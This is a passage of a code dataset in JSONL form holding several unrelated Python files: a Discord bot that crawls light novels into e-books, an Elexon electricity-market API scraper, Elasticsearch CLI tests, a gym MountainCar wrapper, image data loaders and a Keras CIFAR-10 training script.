return Lc\n\n\nif __name__ == \"__main__\":\n a = np.array([2, 0, 1, 1, 0, 0, 0, 1])\n A = np.fft.rfft(a)\n h = np.fft.irfft(A * A.conj())\n print(h)\n","sub_path":"spatial_corr.py","file_name":"spatial_corr.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"515440663","text":"import os\n\nfrom unittest import TestCase\n\nfrom elasticsearch import Elasticsearch, NotFoundError\nfrom sqlalchemy.engine.reflection import Inspector\n\nfrom babbage_fiscal.cli import cli\nfrom babbage_fiscal import model_registry, config\n\nfrom click.testing import CliRunner\n\nfrom .test_common import SAMPLE_PACKAGES, LOCAL_ELASTICSEARCH\n\nMODEL_NAME, SAMPLE_PACKAGE = SAMPLE_PACKAGES['md']\n\n\nclass CLITest(TestCase):\n\n def setUp(self):\n \"\"\"\n Set-up a dummy DB for the test\n :return:\n \"\"\"\n self.es = Elasticsearch(hosts=[LOCAL_ELASTICSEARCH])\n try:\n self.es.indices.delete(index='packages')\n except 
NotFoundError:\n pass\n self.runner = CliRunner()\n self.dbfilename = 'test.db'\n config._set_connection_string('sqlite:///test.db')\n\n def tearDown(self):\n if os.path.exists(self.dbfilename):\n os.unlink(self.dbfilename)\n\n def test_load_fdp_cmd_success(self):\n \"\"\"\n Simple invocation of the load-fdp command\n \"\"\"\n self.runner.invoke(cli,\n args=['load-fdp', '--package', SAMPLE_PACKAGE],\n env={'OS_ELASTICSEARCH_ADDRESS': LOCAL_ELASTICSEARCH})\n self.cm = model_registry.ModelRegistry(self.es)\n self.assertGreater(len(list(self.cm.list_models())), 0, 'no dataset was loaded')\n\n def test_create_tables_cmd_success(self):\n \"\"\"\n Simple invocation of the create-tables command\n \"\"\"\n self.runner.invoke(cli,\n args=['create-tables'],\n env={'OS_ELASTICSEARCH_ADDRESS': LOCAL_ELASTICSEARCH})\n engine = config.get_engine()\n inspector = Inspector.from_engine(engine)\n self.assertTrue('models' not in inspector.get_table_names())\n","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"389279373","text":"import gym\n# from main import render\nnum_input = 2\nnum_output = 3\nmoves = [0,1,2]\nenv_ver = gym.make('MountainCar-v0')\nis_render = False\ndef init_run():\n observation = env_ver.reset()\n return observation\n\ndef main_mountain_car(move,render):\n if move != \"end\":\n if render:\n env_ver.render()\n observation, reward, done, info = env_ver.step(move)\n return observation,reward,done\n\n# agent.reward = ob_reward*1000/step\n# if observation[0] > ob_reward: ob_reward = observation[0]\n# step = 0\n # ob_reward = -math.inf","sub_path":"mountainCar.py","file_name":"mountainCar.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"282382188","text":"# -*- coding: utf-8 -*-\nimport asyncio\nimport logging\nimport os\nimport random\nimport re\nimport shutil\nfrom concurrent.futures import ThreadPoolExecutor\nfrom datetime import datetime\nfrom urllib.parse import quote\n\nimport discord\n\nfrom ...core.app import App\nfrom ...sources import crawler_list\nfrom ...utils.uploader import upload\nfrom .config import max_workers, public_ip, public_path\n\nlogger = logging.getLogger(__name__)\n\navailable_formats = [\n 'epub',\n 'text',\n 'web',\n 'mobi',\n 'pdf',\n 'fb2',\n]\n\ndisable_search = os.getenv('DISCORD_DISABLE_SEARCH') == 'true'\n\n\nclass MessageHandler:\n def __init__(self, client):\n self.app = App()\n self.client = client\n self.state = None\n self.executor = ThreadPoolExecutor(max_workers)\n self.last_activity = datetime.now()\n self.closed = False\n # end def\n\n def process(self, message):\n self.last_activity = datetime.now()\n self.executor.submit(self.handle_message, message)\n # end def\n\n def destroy(self):\n try:\n self.client.handlers.pop(str(self.user.id))\n self.send_sync('Closing current session...')\n self.executor.shutdown(wait=False)\n self.app.destroy()\n # shutil.rmtree(self.app.output_path, ignore_errors=True)\n except Exception:\n logger.exception('While destroying MessageHandler')\n finally:\n self.send_sync('Session closed. 
Send *start* to start over')\n self.closed = True\n # end try\n # end def\n\n def handle_message(self, message):\n self.message = message\n self.user = message.author\n if not self.state:\n self.state = self.get_novel_url\n # end if\n try:\n self.state()\n except Exception as ex:\n logger.exception('Failed to process state')\n self.send_sync('Something went wrong!\\n`%s`' % str(ex))\n self.executor.submit(self.destroy)\n # end try\n # end def\n\n # ---------------------------------------------------------------------- #\n\n def wait_for(self, async_coroutine):\n asyncio.run_coroutine_threadsafe(\n async_coroutine,\n self.client.loop\n ).result()\n # end def\n\n async def send(self, *contents):\n if self.closed:\n return\n self.last_activity = datetime.now()\n async with self.user.typing():\n for text in contents:\n if not text:\n continue\n # end if\n await self.user.send(text)\n # end for\n # end with\n # end def\n\n def send_sync(self, *contents):\n self.wait_for(self.send(*contents))\n # end def\n\n def busy_state(self):\n text = self.message.content.strip()\n\n if text == '!cancel':\n self.executor.submit(self.destroy)\n return\n # end if\n\n self.send_sync(random.choice([\n 'Send !cancel to stop this session.',\n 'Please wait...',\n 'Processing, give me more time...',\n 'I am just a bot. Please be patient...',\n 'Waiting for more RAM...',\n 'A little bit longer...',\n 'I\\'ll be with you in a bit...',\n 'Patience! This is difficult, you know...',\n ]))\n # end def\n\n # ---------------------------------------------------------------------- #\n\n def get_novel_url(self):\n self.state = self.busy_state\n if disable_search:\n self.send_sync(\n 'Send me a URL of a novel info page with a chapter list!'\n )\n else:\n self.send_sync(\n 'I recognize these two categories:\\n'\n '- Profile page url of a lightnovel.\\n'\n '- A query to search your lightnovel.',\n 'What are you looking for?'\n )\n # end if\n self.state = self.handle_novel_url\n # end def\n\n def handle_novel_url(self):\n self.state = self.busy_state\n\n text = self.message.content.strip()\n if text == '!cancel':\n self.executor.submit(self.destroy)\n return\n # end if\n\n try:\n self.app.user_input = self.message.content.strip()\n self.app.init_search()\n except Exception:\n self.send_sync('\\n'.join([\n 'Sorry! I do not recognize this source yet.',\n 'See list of supported sources here:',\n 'https://github.com/dipu-bd/lightnovel-crawler#c3-supported-sources',\n ]))\n self.get_novel_url()\n # end try\n\n if self.app.crawler:\n self.send_sync('Got your page link')\n self.get_novel_info()\n elif len(self.app.user_input) < 4:\n self.send_sync('Your query is too short')\n self.state = self.handle_novel_url\n self.get_novel_url()\n else:\n if disable_search:\n self.send_sync(\n 'Sorry! 
I can not do searching.\\n'\n 'Please use Google to find your novel first'\n )\n self.get_novel_url()\n else:\n self.send_sync(\n 'Searching %d sources for \"%s\"\\n' % (\n len(self.app.crawler_links), self.app.user_input),\n )\n self.display_novel_selection()\n # end if\n # end if\n # end def\n\n # ------------------------------------------------------------ #\n # SEARCHING -- skips if DISCORD_DISABLE_SEARCH is 'true'\n # ------------------------------------------------------------ #\n\n def display_novel_selection(self):\n self.app.search_novel()\n if self.closed:\n return\n\n if len(self.app.search_results) == 0:\n self.send_sync('No novels found for \"%s\"' % self.app.user_input)\n self.state = self.handle_novel_url\n elif len(self.app.search_results) == 1:\n self.selected_novel = self.app.search_results[0]\n self.display_sources_selection()\n else:\n self.send_sync('\\n'.join([\n 'Found %d novels:' % len(self.app.search_results)\n ] + [\n '%d. **%s** `%d sources`' % (\n i + 1,\n item['title'],\n len(item['novels'])\n ) for i, item in enumerate(self.app.search_results)\n ] + [\n '',\n 'Enter name or index of your novel.',\n 'Send `!cancel` to stop this session.'\n ]))\n self.state = self.handle_novel_selection\n # end if\n # end def\n\n def handle_novel_selection(self):\n self.state = self.busy_state\n\n text = self.message.content.strip()\n if text.startswith('!cancel'):\n self.get_novel_url()\n return\n # end if\n match_count = 0\n selected = None\n for i, res in enumerate(self.app.search_results):\n if str(i + 1) == text:\n selected = res\n match_count += 1\n elif text.isdigit() or len(text) < 3:\n pass\n elif res['title'].lower().find(text) != -1:\n selected = res\n match_count += 1\n # end if\n # end for\n if match_count != 1:\n self.send_sync(\n 'Sorry! You should select *one* novel from the list (%d selected).' % match_count)\n self.display_novel_selection()\n return\n # end if\n self.selected_novel = selected\n self.display_sources_selection()\n # end def\n\n def display_sources_selection(self):\n novel_list = self.selected_novel['novels']\n self.send_sync('**%s** is found in %d sources:\\n' %\n (self.selected_novel['title'], len(novel_list)))\n\n for j in range(0, len(novel_list), 10):\n self.send_sync('\\n'.join([\n '%d. <%s> %s' % (\n (j + i + 1),\n item['url'],\n item['info'] if 'info' in item else ''\n ) for i, item in enumerate(novel_list[j:j+10])\n ]))\n # end for\n\n self.send_sync('\\n'.join([\n '',\n 'Enter index or name of your source.',\n 'Send `!cancel` to stop this session.',\n ]))\n self.state = self.handle_sources_to_search\n # end def\n\n def handle_sources_to_search(self):\n self.state = self.busy_state\n\n if len(self.selected_novel['novels']) == 1:\n novel = self.selected_novel['novels'][0]\n return self.handle_search_result(novel)\n # end if\n text = self.message.content.strip()\n if text.startswith('!cancel'):\n return self.get_novel_url()\n # end if\n match_count = 0\n selected = None\n for i, res in enumerate(self.selected_novel['novels']):\n if str(i + 1) == text:\n selected = res\n match_count += 1\n elif text.isdigit() or len(text) < 3:\n pass\n elif res['url'].lower().find(text) != -1:\n selected = res\n match_count += 1\n # end if\n # end for\n if match_count != 1:\n self.send_sync(\n 'Sorry! You should select *one* source from the list (%d selected).' 
% match_count)\n            return self.display_sources_selection()\n        # end if\n        self.handle_search_result(selected)\n    # end def\n\n    def handle_search_result(self, novel):\n        self.send_sync('Selected: %s' % novel['url'])\n        self.app.init_crawler(novel['url'])\n        self.get_novel_info()\n    # end def\n\n    # ---------------------------------------------------------------------- #\n\n    def get_novel_info(self):\n        # TODO: Handle login here\n\n        self.send_sync('Getting information about your novel...')\n        self.executor.submit(self.download_novel_info)\n    # end def\n\n    def download_novel_info(self):\n        self.state = self.busy_state\n        try:\n            self.app.get_novel_info()\n            if self.closed:\n                return\n        except Exception as ex:\n            logger.exception('Failed to get novel info')\n            self.send_sync('Failed to get novel info.\\n`%s`' % str(ex))\n            self.executor.submit(self.destroy)\n        # end try\n\n        # Setup output path\n        root = os.path.abspath('.discord_bot_output')\n        if public_path and os.path.exists(public_path):\n            root = os.path.abspath(public_path)\n        # end if\n        good_name = os.path.basename(self.app.output_path)\n        output_path = os.path.join(root, str(self.user.id), good_name)\n        if os.path.exists(output_path):\n            shutil.rmtree(output_path, ignore_errors=True)\n        # end if\n\n        os.makedirs(output_path, exist_ok=True)\n        self.app.output_path = output_path\n\n        self.display_range_selection()\n    # end def\n\n    def display_range_selection(self):\n        self.send_sync('\\n'.join([\n            'Now you choose what to download:',\n            '- Send `!cancel` to stop this session.',\n            '- Send `all` to download all chapters',\n            '- Send `last 20` to download last 20 chapters. Choose any number you want.',\n            '- Send `first 10` for first 10 chapters. Choose any number you want.',\n            '- Send `volume 2 5` to download volume 2 and 5. Pass as many numbers as you need.',\n            '- Send `chapter 110 120` to download chapter 110 to 120. 
Only two numbers are accepted.',\n        ]))\n        self.send_sync(\n            '**It has `%d` volumes and `%d` chapters.**' % (\n                len(self.app.crawler.volumes),\n                len(self.app.crawler.chapters)\n            )\n        )\n        self.state = self.handle_range_selection\n    # end def\n\n    def handle_range_selection(self):\n        self.state = self.busy_state\n        text = self.message.content.strip().lower()\n        if text == '!cancel':\n            self.executor.submit(self.destroy)\n            return\n        # end if\n\n        if text == 'all':\n            self.app.chapters = self.app.crawler.chapters[:]\n        elif re.match(r'^first(\\s\\d+)?$', text):\n            text = text[len('first'):].strip()\n            n = int(text) if text.isdigit() else 50\n            n = 50 if n < 0 else n\n            self.app.chapters = self.app.crawler.chapters[: n]\n        elif re.match(r'^last(\\s\\d+)?$', text):\n            text = text[len('last'):].strip()\n            n = int(text) if text.isdigit() else 50\n            n = 50 if n < 0 else n\n            self.app.chapters = self.app.crawler.chapters[-n:]\n        elif re.match(r'^volume(\\s\\d+)+$', text):\n            text = text[len('volume'):].strip()\n            selected = re.findall(r'\\d+', text)\n            self.send_sync(\n                'Selected volumes: ' + ', '.join(selected),\n            )\n            selected = [int(x) for x in selected]\n            self.app.chapters = [\n                chap for chap in self.app.crawler.chapters\n                if selected.count(chap['volume']) > 0\n            ]\n        elif re.match(r'^chapter(\\s\\d+)+$', text):\n            text = text[len('chapter'):].strip()\n            pair = text.split(' ')\n            if len(pair) == 2:\n                def resolve_chapter(name):\n                    cid = 0\n                    if name.isdigit():\n                        cid = int(name)\n                    else:\n                        cid = self.app.crawler.get_chapter_index_of(name)\n                    # end if\n                    return cid - 1\n                # end def\n                first = resolve_chapter(pair[0])\n                second = resolve_chapter(pair[1])\n                if first > second:\n                    second, first = first, second\n                # end if\n                # both endpoints must be valid, and the slice should include the second chapter\n                if first >= 0 and second < len(self.app.crawler.chapters):\n                    self.app.chapters = self.app.crawler.chapters[first: second + 1]\n                # end if\n            # end if\n            if len(self.app.chapters) == 0:\n                self.send_sync('Chapter range is not valid. Please try again')\n                self.state = self.handle_range_selection\n                return\n            # end if\n        else:\n            self.send_sync(\n                'Sorry! I did not recognize your input. Please try again')\n            self.state = self.handle_range_selection\n            return\n        # end if\n\n        if len(self.app.chapters) == 0:\n            self.send_sync(\n                'You have not selected any chapters. Please select at least one')\n            self.state = self.handle_range_selection\n            return\n        # end if\n\n        self.send_sync('Got your range selection')\n        self.display_output_selection()\n    # end def\n\n    def display_output_selection(self):\n        self.state = self.busy_state\n        self.send_sync('\\n'.join([\n            'Now you can choose book formats to download:',\n            '- Send `!cancel` to stop.',\n            # '- Send `!all` to download all formats _(it may take a very very long time!)_',\n            'To select specific output formats:',\n            '- Send `pdf` to download only pdf format',\n            '- Send `epub pdf` to download both epub and pdf formats.',\n            '- Send `{space separated format names}` for multiple formats',\n            'Available formats: `' + '` `'.join(available_formats) + '`',\n        ]))\n        self.state = self.handle_output_selection\n    # end def\n\n    def handle_output_selection(self):\n        self.state = self.busy_state\n\n        text = self.message.content.strip()\n        if text.startswith('!cancel'):\n            self.get_novel_url()\n            return\n        # end if\n\n        output_format = set(re.findall(\n            '|'.join(available_formats), text.lower()))\n        if not len(output_format):\n            output_format = set(available_formats)\n            self.send_sync('Sorry! I did not recognize your input. ' +\n                           'By default, I shall generate in (%s) formats.' 
% (', ' .join(output_format)))\n # end if\n\n self.app.output_formats = {x: (x in output_format)\n for x in available_formats}\n self.send_sync('I will generate e-book in (%s) format' %\n (', ' .join(output_format)))\n\n self.send_sync('\\n'.join([\n 'Starting download...',\n 'Send anything to view status.',\n 'Send `!cancel` to stop it.',\n ]))\n\n self.executor.submit(self.start_download)\n # end def\n\n # ---------------------------------------------------------------------- #\n\n def start_download(self):\n self.app.pack_by_volume = False\n\n try:\n self.send_sync(\n '**%s**' % self.app.crawler.novel_title,\n 'Downloading %d chapters...' % len(self.app.chapters),\n )\n self.app.start_download()\n self.send_sync('Download complete.')\n if self.closed:\n return\n\n self.send_sync('Binding books...')\n self.app.bind_books()\n self.send_sync('Book binding completed.')\n if self.closed:\n return\n\n self.send_sync('Compressing output folder...')\n self.app.compress_books()\n self.send_sync('Compressed output folder.')\n if self.closed:\n return\n\n if public_ip and public_path and os.path.exists(public_path):\n self.send_sync('Publishing files...')\n self.publish_files()\n else:\n self.send_sync('Uploading files...')\n for archive in self.app.archived_outputs:\n self.upload_file(archive)\n # end for\n # end if\n except Exception as ex:\n logger.exception('Failed to download')\n self.send_sync('Download failed!\\n`%s`' % str(ex))\n self.executor.submit(self.destroy)\n finally:\n self.executor.submit(self.destroy)\n # end try\n # end def\n\n def publish_files(self):\n try:\n download_url = '%s/%s/%s' % (public_ip.strip('/'),\n quote(str(self.user.id)),\n quote(os.path.basename(self.app.output_path)))\n self.send_sync('Download files from:\\n' + download_url)\n except Exception:\n logger.exception('Fail to publish')\n # end try\n # end def\n\n def upload_file(self, archive):\n # Check file size\n file_size = os.stat(archive).st_size\n if file_size > 7.99 * 1024 * 1024:\n self.send_sync(\n 'File %s exceeds 8MB. Uploading To Google Drive.' % os.path.basename(archive))\n description = 'Generated By : Discord Bot Ebook Smelter'\n link_id = upload(archive, description)\n if link_id:\n self.send_sync('https://drive.google.com/open?id=%s' % link_id)\n else:\n self.send_sync('Failed to upload to google drive')\n # end if\n else:\n # Upload small files to discord directly\n k = 0\n while(file_size > 1024 and k < 3):\n k += 1\n file_size /= 1024.0\n # end while\n self.send_sync(\n 'Uploading %s [%d%s] ...' 
% (\n os.path.basename(archive),\n int(file_size * 100) / 100.0,\n ['B', 'KB', 'MB', 'GB'][k]\n )\n )\n self.wait_for(\n self.user.send(\n file=discord.File(\n open(archive, 'rb'),\n os.path.basename(archive)\n )\n )\n )\n # end if\n # end def\n# end class\n","sub_path":"lncrawl/bots/discord/message_handler.py","file_name":"message_handler.py","file_ext":"py","file_size_in_byte":20107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"270054279","text":"from conf import *\n\nIMAGE_RESIZE_SIZE = 64\n\n\n# read the train and test data\n\ndef load_csv():\n print('Loading CSV data...')\n train_csv = pandas.read_csv(DATA_PATH + '/train.csv') # (990, 194)\n test_csv = pandas.read_csv(DATA_PATH + '/test.csv') # (594, 193)\n\n return train_csv, test_csv\n\n\ndef load_train_labels():\n train_csv, test_csv = load_csv()\n le = LabelEncoder()\n le.fit(train_csv.species)\n train_labels_raw = le.transform(train_csv.species)\n # Convert class vectors to binary class matrices (one-hot encoding)\n train_labels = keras.utils.to_categorical(train_labels_raw, 99)\n\n return train_labels\n\n\ndef load_pre_extracted_features(standardize=False):\n train_csv, test_csv = load_csv()\n\n # get the pre-extracted features\n train_feat = train_csv.copy()\n test_feat = test_csv.copy()\n train_feat = train_feat.drop(['id', 'species'], axis=1)\n test_feat = test_feat.drop(['id'], axis=1)\n\n if standardize is True:\n # Standardize features by removing the mean and scaling to unit variance\n train_feat = StandardScaler().fit(train_feat).transform(train_feat) # (990, 192)\n test_feat = StandardScaler().fit(test_feat).transform(test_feat) # (594, 192)\n else:\n train_feat = train_feat.as_matrix()\n test_feat = test_feat.as_matrix()\n\n print('train_feat shape', train_feat.shape)\n print('test_feat shape', test_feat.shape)\n\n return train_feat, test_feat\n\n\ndef load_image_data_resize_directly():\n print('Loading images data...')\n image_data = {}\n for img_file in os.listdir(DATA_PATH + '/images'):\n resized_img = imresize(imread(DATA_PATH + '/images/' + img_file),\n (IMAGE_RESIZE_SIZE, IMAGE_RESIZE_SIZE)).astype(np.float32)\n image_data[img_file.split(\".\")[0]] = resized_img\n\n return image_data\n\n\ndef load_image_data_padded_and_resize():\n print('Loading images data...')\n image_data = {}\n for img_file in os.listdir(DATA_PATH + '/images'):\n img = imread(DATA_PATH + '/images/' + img_file)\n h, w = img.shape\n max_dim = max(h, w)\n padded_img = np.lib.pad(img,\n (((max_dim - h) // 2, max_dim - h - (max_dim - h) // 2),\n ((max_dim - w) // 2, max_dim - w - (max_dim - w) // 2)),\n 'constant', constant_values=1)\n resized_img = imresize(padded_img, (IMAGE_RESIZE_SIZE, IMAGE_RESIZE_SIZE)).astype(np.float32)\n image_data[img_file.split(\".\")[0]] = resized_img\n\n return image_data\n","sub_path":"Models/data_reader.py","file_name":"data_reader.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"447788375","text":"##############################################################################\n#\n# Copyright (c) 2006 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.0 (ZPL). 
A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"Testing for z3c.etestbrowser\n\n$Id$\n\"\"\"\n\nfrom zope.app.testing import functional\nimport doctest\nimport os.path\nimport unittest\nimport z3c.etestbrowser\nimport zope.app.wsgi.testlayer\n\n\nlayer = functional.ZCMLLayer(\n os.path.join(os.path.split(__file__)[0], 'ftesting.zcml'),\n __name__, 'ETestBrowserLayer', allow_teardown=True)\n\nwsgi_layer = zope.app.wsgi.testlayer.BrowserLayer(z3c.etestbrowser, allowTearDown=True)\n\ndef setUpWSGI(test):\n test.globs['wsgi_app'] = wsgi_layer.make_wsgi_app()\n\n\ndef test_suite():\n suite = unittest.TestSuite()\n\n test = functional.FunctionalDocFileSuite(\n \"README.txt\",\n \"over_the_wire.txt\",\n optionflags=doctest.REPORT_NDIFF|doctest.NORMALIZE_WHITESPACE|\n doctest.ELLIPSIS)\n test.layer = layer\n suite.addTest(test)\n\n wsgi_test = doctest.DocFileSuite(\n \"wsgi.txt\",\n setUp=setUpWSGI,\n optionflags=doctest.NORMALIZE_WHITESPACE|doctest.ELLIPSIS)\n wsgi_test.layer = wsgi_layer\n suite.addTest(wsgi_test)\n return suite\n","sub_path":"src/z3c/etestbrowser/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"416600846","text":"\"\"\"\n\n\"\"\"\nimport argparse\nfrom collections import defaultdict, namedtuple\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nimport requests\nimport xml.etree.ElementTree as ET\n\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n\ndef get_dates(start_date, days):\n \"\"\"\n Creates a list of dates\n\n args\n start_date (str)\n days (int) number of days after start date\n\n returns\n dates (list) list of strings\n \"\"\"\n start_date = dt.strptime(start_date, '%Y-%m-%d')\n dates = []\n for day in range(days):\n dates.append(start_date + timedelta(days=day))\n return dates\n\n\nclass ReportGrabber(object):\n \"\"\"\n Grabs data from Elexon\n\n args\n name (str) name of the Elexon report\n data_cols (list) list of columns to get for the report\n key (str) API key\n \"\"\"\n def __init__(self, name, data_cols, key):\n self.name = name\n\n assert isinstance(data_cols, list)\n self.data_cols = data_cols\n\n self.columns = ['settlementDate', 'settlementPeriod']\n self.columns.extend(data_cols)\n\n self.key = key\n\n def scrape_report(self, settlement_date):\n \"\"\"\n Gets data for one settlement date\n\n args\n settlement_date (str)\n\n returns\n output (dict) {column name : data}\n \"\"\"\n url = self.get_url(settlement_date)\n print('scraping {} {}'.format(self.name, settlement_date))\n\n # use the requests library to get the response from this url\n req = requests.get(url)\n\n if 'An invalid API key has been passed' in req.text:\n raise ValueError('Invalid API key')\n\n self.root = ET.fromstring(req.content)\n\n # iterate over the XML\n # save each of the columns into a dict\n output = defaultdict(list)\n\n # we can narrow down where we need to look in this XML\n for parent in self.root.findall(\"./responseBody/responseList/item\"):\n\n for child in parent:\n\n # condition that only gets the data we want\n # if we wanted all raw data we wouldn't do this\n if child.tag in 
self.columns:\n output[child.tag].append(child.text)\n\n return output\n\n def create_dataframe(self, output_dict):\n \"\"\"\n Creates a dataframe from the output dictionary\n Will create a dataframe for one settlement_date, as the output_dict\n will be data for one settlement_date\n\n args\n output_dict (dict) {column name : data}\n\n returns\n output (DataFrame)\n \"\"\"\n # create a dataframe\n output = pd.DataFrame().from_dict(output_dict)\n\n # create the time stamp by iterating over each row\n # there must be a better way!\n for row_idx in range(output.shape[0]):\n\n date = dt.strptime(output.loc[row_idx, 'settlementDate'], '%Y-%m-%d')\n stamp = date + timedelta(minutes=30*int(output.loc[row_idx, 'settlementPeriod']))\n output.loc[row_idx, 'time_stamp'] = stamp\n\n output.loc[:, 'time_stamp'] = pd.to_datetime(output.loc[:, 'time_stamp'])\n\n output.index = output.loc[:, 'time_stamp']\n output.drop('time_stamp', inplace=True, axis=1)\n\n # iterating through the XML creates duplicates - not sure why\n # here we drop duplicates and sort the index\n output.drop_duplicates(inplace=True)\n output.sort_index(inplace=True)\n\n # finally we set the dype of the columns correctly\n for col in self.data_cols:\n output.loc[:, col] = pd.to_numeric(output.loc[:, col])\n output = output.loc[:, self.data_cols]\n return output\n\n def get_url(self, settlement_date):\n \"\"\"\n Forms the URL to query the Elexon API\n\n args\n settlement_date (str)\n\n returns\n url (str)\n \"\"\"\n url = 'https://api.bmreports.com/BMRS/{}/'.format(self.name)\n url += 'v1?APIKey={}&'.format(self.key)\n url += 'ServiceType=xml&'\n url += 'Period=*&SettlementDate={}'.format(settlement_date)\n return url\n\n\nif __name__ == '__main__':\n # send in the ELEXON API key from the command line\n parser = argparse.ArgumentParser()\n parser.add_argument('--key')\n args = parser.parse_args()\n key = args.key\n\n # the reports we want data for\n # format of {name: columns}\n reports = {'B1770': ['imbalancePriceAmountGBP'],\n 'B1780': ['imbalanceQuantityMAW']}\n\n # the dates we want data for\n settlementdates = get_dates('2015-01-01', 3*365)\n\n # report data is a global list our data\n report_data = []\n for name, cols in reports.items():\n report = ReportGrabber(name, cols, key)\n\n # dataframes is a list of reports for each date\n dataframes = []\n for date in settlementdates:\n output_dict = report.scrape_report(date)\n dataframes.append(report.create_dataframe(output_dict))\n\n all_dates = pd.concat(dataframes, axis=0)\n report_data.append(all_dates)\n\n report_data = pd.concat(report_data, axis=1)\n print('report data starts at {}'.format(report_data.index[0]))\n print('report data ends at {}'.format(report_data.index[-1]))\n print(report_data.head())\n print(report_data.describe())\n\n report_data.to_csv('elexon_data/elexon_report_data.csv')\n","sub_path":"elexon_data_scraping.py","file_name":"elexon_data_scraping.py","file_ext":"py","file_size_in_byte":5414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"460355564","text":"import numpy as np\nfrom keras.optimizers import SGD\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom trainer.datasets import get_data\nfrom trainer.models import get_model\nimport time\nimport argparse\nfrom tensorflow.python.lib.io import file_io\nfrom keras.datasets import cifar10, mnist, cifar100\nfrom keras.utils import np_utils\nfrom trainer.EPD import LossLearningRateScheduler\nfrom trainer.EventBasedLE import 
EventBasedLearningEpochStopper\n\n\ndef combine_result(h, h_training_epoch):\n h.history['acc'] += h_training_epoch.history['acc']\n h.history['loss'] += h_training_epoch.history['loss']\n h.history['val_acc'] += h_training_epoch.history['val_acc']\n h.history['val_loss'] += h_training_epoch.history['val_loss']\n return h;\n\ndef main(job_dir,**args):\n NUM_CLASSES = {'mnist': 10, 'svhn': 10, 'cifar-10': 10, 'cifar-100': 100}\n dataset = \"cifar-10\"\n X_train, y_train, X_test, y_test, un_selected_index = get_data(dataset, random_shuffle=False)\n\n\n image_shape = X_train.shape[1:]\n model = get_model(dataset, input_tensor=None, input_shape=image_shape, num_classes=NUM_CLASSES[dataset])\n optimizer = SGD(lr=0.01, decay=0, momentum=0)\n\n\n datagen = ImageDataGenerator(\n featurewise_center = False, # set input mean to 0 over the dataset\n samplewise_center = False, # set each sample mean to 0\n featurewise_std_normalization = False, # divide inputs by std of the dataset\n samplewise_std_normalization = False, # divide each input by its std\n zca_whitening = False, # apply ZCA whitening\n rotation_range = 0, # randomly rotate images in the range (degrees, 0 to 180)\n width_shift_range = 0.1, # randomly shift images horizontally (fraction of total width)\n height_shift_range = 0.1, # randomly shift images vertically (fraction of total height)\n horizontal_flip = True, # randomly flip images\n vertical_flip = False, # randomly flip images\n )\n datagen.fit(X_train)\n\n epochs_training = 60\n total_epoch_training = 300\n batch_size = 128\n training_steps = 10000\n un_selected_index = range(X_train.shape[0])\n steps = int(np.floor(len(un_selected_index) / training_steps))\n\n\n sub_un_selected_list = un_selected_index[0:training_steps]\n X_clean_iteration = X_train[sub_un_selected_list]\n y_clean_iteration = y_train[sub_un_selected_list]\n model.compile(loss='categorical_crossentropy',\n optimizer=optimizer,\n metrics=['acc'])\n h = model.fit_generator(datagen.flow(X_clean_iteration, y_clean_iteration, batch_size=batch_size),\n steps_per_epoch=X_clean_iteration.shape[0]//batch_size, epochs=epochs_training,\n validation_data=(X_test, y_test), callbacks = [LossLearningRateScheduler(base_lr = 0.01, kd_coef = 5, loss_zero = 0, eventbasedLR = True), EventBasedLearningEpochStopper(alpha_threshold = -0.001, loss_zero = 0, lookbackward_epoch = 5, accumulated_epoch = 0, limit_epoch = total_epoch_training, ending_epoch = 10)]\n )\n round = 0\n turn = 1\n while len(h.history['loss']) < total_epoch_training:\n for i in np.arange(1, steps):\n turn += 1\n if len(h.history['loss']) >= total_epoch_training:\n break\n if i == 0 and round != 0:\n sub_un_selected_list = un_selected_index[0:training_steps]\n if i != steps - 1:\n sub_un_selected_list = un_selected_index[i*training_steps:(i+1)*training_steps]\n else:\n sub_un_selected_list = un_selected_index[i*training_steps:]\n\n X_clean_iteration = X_train[sub_un_selected_list]\n y_clean_iteration = y_train[sub_un_selected_list]\n\n model.compile(loss='categorical_crossentropy',\n optimizer=optimizer,\n metrics=['acc'])\n h_training_epoch = model.fit_generator(datagen.flow(X_clean_iteration, y_clean_iteration, batch_size=batch_size),\n steps_per_epoch=X_clean_iteration.shape[0]//batch_size, epochs=epochs_training,\n validation_data=(X_test, y_test), callbacks = [LossLearningRateScheduler(base_lr = 0.01, kd_coef = 5, loss_zero = h.history['loss'][0], eventbasedLR = True), EventBasedLearningEpochStopper(alpha_threshold = -0.001, loss_zero = h.history['loss'][0], 
